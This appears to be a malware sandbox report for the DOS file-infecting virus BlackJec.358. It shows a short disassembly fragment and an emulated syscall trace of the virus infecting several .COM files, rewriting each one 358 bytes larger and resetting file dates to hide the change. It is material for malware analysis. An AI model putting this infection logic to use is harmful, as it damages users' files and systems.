Sample viewer

vx.netlux.org/Virus.DOS.BlackJec.358.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:56:34.119868975Z 42 PC: 12a7a | Get date 0x12a7a: mov word ptr [0xf2], dx
0x12a7e: mov word ptr [0xf4], cx
0x12a82: stc
0x12a83: mov dx, 0x25d
0x12a86: mov ah, 0x4e
0x12a88: mov cx, 0x20
0x12a8b: int 0x21
0x12a8d: or ax, ax
0x12a8f: je 0x12a94
0x12a91: jmp 0x12b5e
0x12a94: mov ah, 0x2f
0x12a96: int 0x21
0x12a98: mov ax, word ptr es:[bx + 0x1a]
0x12a9c: mov word ptr [0xfc], ax
0x12a9f: add bx, 0x1e
0x12aa2: mov word ptr [0xfe], bx
0x12aa6: mov ax, 0x4f43
0x12aa9: sub ax, word ptr [0x9e]
0x12aad: jne 0x12ab2
0x12aaf: jmp 0x12b52
2018-12-17T22:56:34.123306959Z 78 PC: 12a8d | Find first file
2018-12-17T22:56:34.143886534Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T22:56:34.145584025Z 43 PC: 12aee | Set date
2018-12-17T22:56:34.150414218Z 61 PC: 12af6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:56:34.158609096Z 63 PC: 12b04 | Read file or device (Read 407 bytes on handle 5)
2018-12-17T22:56:34.166106863Z 60 PC: 12b36 | Create or truncate file
2018-12-17T22:56:34.188150581Z 64 PC: 12b48 | Write file or device (Write 765 bytes on handle 6)
2018-12-17T22:56:34.197969392Z 62 PC: 12b4c | Close file
2018-12-17T22:56:34.206937696Z 79 PC: 12b57 | Find next file
2018-12-17T22:56:34.209914332Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T22:56:34.212396159Z 43 PC: 12aee | Set date
2018-12-17T22:56:34.216294178Z 61 PC: 12af6 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:56:34.229422072Z 63 PC: 12b04 | Read file or device (Read 27 bytes on handle 6)
2018-12-17T22:56:34.236913397Z 60 PC: 12b36 | Create or truncate file
2018-12-17T22:56:34.255009913Z 64 PC: 12b48 | Write file or device (Write 385 bytes on handle 7)
2018-12-17T22:56:34.259477824Z 62 PC: 12b4c | Close file
2018-12-17T22:56:34.268882126Z 79 PC: 12b57 | Find next file
2018-12-17T22:56:34.27297934Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T22:56:34.274963731Z 43 PC: 12aee | Set date
2018-12-17T22:56:34.279304132Z 61 PC: 12af6 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:56:34.294291762Z 63 PC: 12b04 | Read file or device (Read 92 bytes on handle 7)
2018-12-17T22:56:34.30194906Z 60 PC: 12b36 | Create or truncate file
2018-12-17T22:56:34.31781985Z 64 PC: 12b48 | Write file or device (Write 450 bytes on handle 8)
2018-12-17T22:56:34.323309283Z 62 PC: 12b4c | Close file
2018-12-17T22:56:34.333306399Z 43 PC: 12b6a | Set date